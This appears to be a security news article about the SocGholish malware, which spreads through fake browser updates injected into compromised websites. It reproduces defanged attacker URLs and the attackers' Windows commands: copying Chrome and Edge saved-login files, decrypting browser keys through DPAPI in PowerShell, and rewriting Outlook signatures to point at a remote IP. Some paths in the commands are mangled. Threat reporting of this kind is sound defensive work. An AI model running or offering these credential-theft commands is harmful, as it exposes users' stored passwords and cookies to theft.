Enterprises are being targeted by the malware known as SocGholish through deceptive browser update prompts.
This malware, notorious for its stealth and the complexity of its delivery mechanisms, has been identified in a series of incidents involving fake browser updates that trick users into downloading malicious payloads.
ESentire has recently published a report highlighting the infiltration of enterprises by the SocGholish malware.
This malware is spreading through fake browser updates and is causing significant security concerns for organizations.
The Infection Vector: Compromised Websites
The initial stage of the SocGholish attack involves compromising legitimate websites, where attackers inject malicious JavaScript code.
Unsuspecting users visiting these websites receive pop-up notifications urging them to download browser updates.
These prompts, however, are cleverly disguised traps.
The downloaded file, typically named “Update.js,” harbors the SocGholish malware, initiating the infection process upon execution.
The SocGholish malware employs sophisticated evasion techniques to avoid detection by automated analysis tools.
Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers
For instance, it checks for automation tools like Selenium through the browser’s “navigator.webdriver” property.
The malware halts further actions if detected, effectively evading automated security analysis.
Upon successful evasion, SocGholish proceeds to execute its payload.
The examples of URLs provided in the script are:
hxxps://ghost.blueecho88[.]com/XnkKYSVbaQg6WzBTaU0mQy0NbxF8QygRLBxpCTsaYT40ClUHLBZkFTsLeA4sWyZDOwt4DixbMFByW3hDZFtvBy4JbEMjhxxps://ghost.blueecho88[.]com/U5WuWyi3zTI3t5RpZKGCeSDhyytxr4wrIfDNMzb2xQQ55vE9IfrALzbn3DQht4J5NufcNCG3lGl/t9x5abfKNz3wxDAl/cw3NeXXPDG30w==
hxxps://ghost.blueecho88[.]com/gcGKZ/rj6Q7l47BVtvWmRfK17xej+6gG76DmHvuk1QHx46ZF8+OwReumqBo=
It employs a multi-stage infection process, beginning with the execution of obfuscated JavaScript code that further downloads additional malicious scripts based on user interaction and specific conditions, such as detecting WordPress cookies indicating an admin session.
A POST request is sent to the URL hxxps://tfuq.register.arpsychotherapy.com/editContent by the script.
The data “lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==” is sent to the server with the “send” method.
Post-Exploitation Activity
Following the initial compromise, attackers engage in hands-on activity, including the extraction of stored passwords from browsers like Microsoft Edge and Google Chrome and copying them to a temporary file for exfiltration using the following commands:
"C:WindowsSystem32cmd.exe" /C type "C:UsersusernameAppDataLocalGoogleChromeUser DataDefaultLogin Data" >> "C:UsersusernameAppDataLocalTemp2radC7958.tmp""C:WindowsSystem32cmd.exe" /C type "C:UsersusernameAppDataLocalMicrosoftEdgeUser DataDefaultLogin Data" >> "C:UsersusernameAppDataLocalTemp2rad01734.tmp"
Shortly after, another command was run to copy login data files from both Edge and Chrome browsers to a different user’s Downloads directory, then log activity or errors to a temporary file (username – is the primary infected user, usename_2 is another user on the same machine):
"C:WindowsSystem32cmd.exe" /C copy "C:UsersusernameAppDataLocalMicrosoftEdgeUser DataDefaultLogin Data" C:usersusername_2 Downloads�395edg.bin© "C:UsersusernameAppDataLocalGoogleChromeUser DataDefaultLogin Data" C:usersusername_2Downloads�396chr.bin >> "C:UsersusernameAppDataLocalTemp2rad5914F.tmp"
Staging the credential data under another user is likely done for redundancy in case the main files are discovered.
The threat players then tried to use PowerShell to run a command encoded in base64.
Using the DPAPI (Data Protection API), the decoded command gets Edge and Chrome’s encryption keys for passwords and cookies and decrypts them.
It then saves the results in a throwaway file.
The decoded commands:
"C:WindowsSystem32cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATAGoogleChromeUser DataLocal State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:UsersusernameAppDataLocalTemp2rad1F269.tmp""C:WindowsSystem32cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATAMicrosoftEdgeUser DataLocal State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:UsersusernameAppDataLocalTemp2rad65036.tmp"
After that, the attackers tried 10 times to run the PowerShell command, which does several things related to downloading, extracting, and setting up a portable version of Python on an infected computer under the “AppDataLocalConnectedDevicesPlatform” path so that it might be used to run more Python payloads.
powershell -c "wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile C:UsersusernameAppDataLocalConnectedDevicesPlatformpython.zip;ls C:Users username AppDataLocalConnectedDevicesPlatformpython.zip;Expand-Archive -LiteralPath C:Users username AppDataLocalConnectedDevicesPlatformpython.zip -DestinationPath C:Users username AppDataLocalConnectedDevicesPlatformpypa;rm C:Users username AppDataLocalConnectedDevicesPlatformpython.zip;ls C:Users username AppDataLocalConnectedDevicesPlatformpypa;wget https://bootstrap.pypa.io/get-pip.py -OutFile C:Users username AppDataLocalConnectedDevicesPlatformpypaget-pip.py;cd C:Users username AppDataLocalConnectedDevicesPlatformpypa;mkdir DLLs;ren python312._pth python312.pth"
The bad guys then used Powershell to run a base64-encoded command that changed the HTML signature files that Microsoft Outlook uses.
"C:WindowsSystem32cmd.exe" /C powershell.exe -encodedCommand Get-ChildItem -Path $env:APPDATAMicrosoftSignatures -Filter *.htm | ForEach-Object { (Get-Content $_.FullName) -replace '![](`"file://170.130.55[.]72/logocompany.jpeg`")
`r`n" | Set-Content $_.FullName } >> "C:UsersusernameAppDataLocalTemp2rad1F1BD.tmp"